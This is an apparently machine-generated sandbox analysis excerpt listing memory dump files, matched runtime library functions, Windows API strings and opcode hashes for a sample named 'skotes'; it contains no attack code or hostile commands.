                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _wcsrchr
                                                                                                                                                                                                                                              • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                              • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                              • Opcode ID: 518eb74a96e6cdcae0e25cc9ec64def4c2359f1c5894d3599876806e758bb435
                                                                                                                                                                                                                                              • Instruction ID: fe74df11bffdd9f5002f3f8e13ff29673a16054afc6667978394e752739d7249
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 518eb74a96e6cdcae0e25cc9ec64def4c2359f1c5894d3599876806e758bb435
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76010437A08A2235F6285018AD02B6713889BC2FB4B26012AFC64F75C1EF44ED42B1E4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BEFB06
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                              • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 348560076-465693683
                                                                                                                                                                                                                                              • Opcode ID: f57886e9dc9f338b05fcbdbefd44897c0196e444f008cb78de6f5f9286ad62d6
                                                                                                                                                                                                                                              • Instruction ID: e2e53ef4d5c37178497b7bf6f1d27fc9985322fcc5411ab834c377cd481be65e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f57886e9dc9f338b05fcbdbefd44897c0196e444f008cb78de6f5f9286ad62d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E401F53266036A699314B6766C8EBBF3AEC8A41A4472014BEB951E7292FEA4D8045260
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 00C020B7
                                                                                                                                                                                                                                                • Part of subcall function 00BFCAF3: Mailbox.LIBCMT ref: 00BFCB2D
                                                                                                                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C020C8
                                                                                                                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 00C020FE
                                                                                                                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C0210F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                              • String ID: e
                                                                                                                                                                                                                                              • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                              • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                              • Instruction ID: 7b1399ff7c1268857ecc8f87a05da0a636fb9680511b973e1ec33eb4c594efb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7511CA31100105ABDF15DE79C88966FB7A9EF01328B14C159FD169F1C2DB71ED05DB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • kernel32.dll, xrefs: 00BED04C
                                                                                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BED03B
                                                                                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 00BED069
                                                                                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 00BED05D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                              • Opcode ID: fb8326b56033a6eef0910a16321e49826ba084da001df2bfdae8d370f69680f4
                                                                                                                                                                                                                                              • Instruction ID: e08108eece9fac8174b68ac8436bbc376ee2137db58091e51931639bb14e7793
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb8326b56033a6eef0910a16321e49826ba084da001df2bfdae8d370f69680f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4201A2717A2B616A9A352B7A6D1DF5F15C8CB52B40F0D15B4BD01E3291EAE0CC0186B1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C14C98
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C14D5E
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00C14DCA
                                                                                                                                                                                                                                                • Part of subcall function 00C0B04B: RtlAllocateHeap.NTDLL(00000000,845AEA34,?,?,00BED3FC,845AEA34,?,00BE7A8B,?,?,?,?,?,?,00BD7465,?), ref: 00C0B07D
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00C14DD3
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00C14DF6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
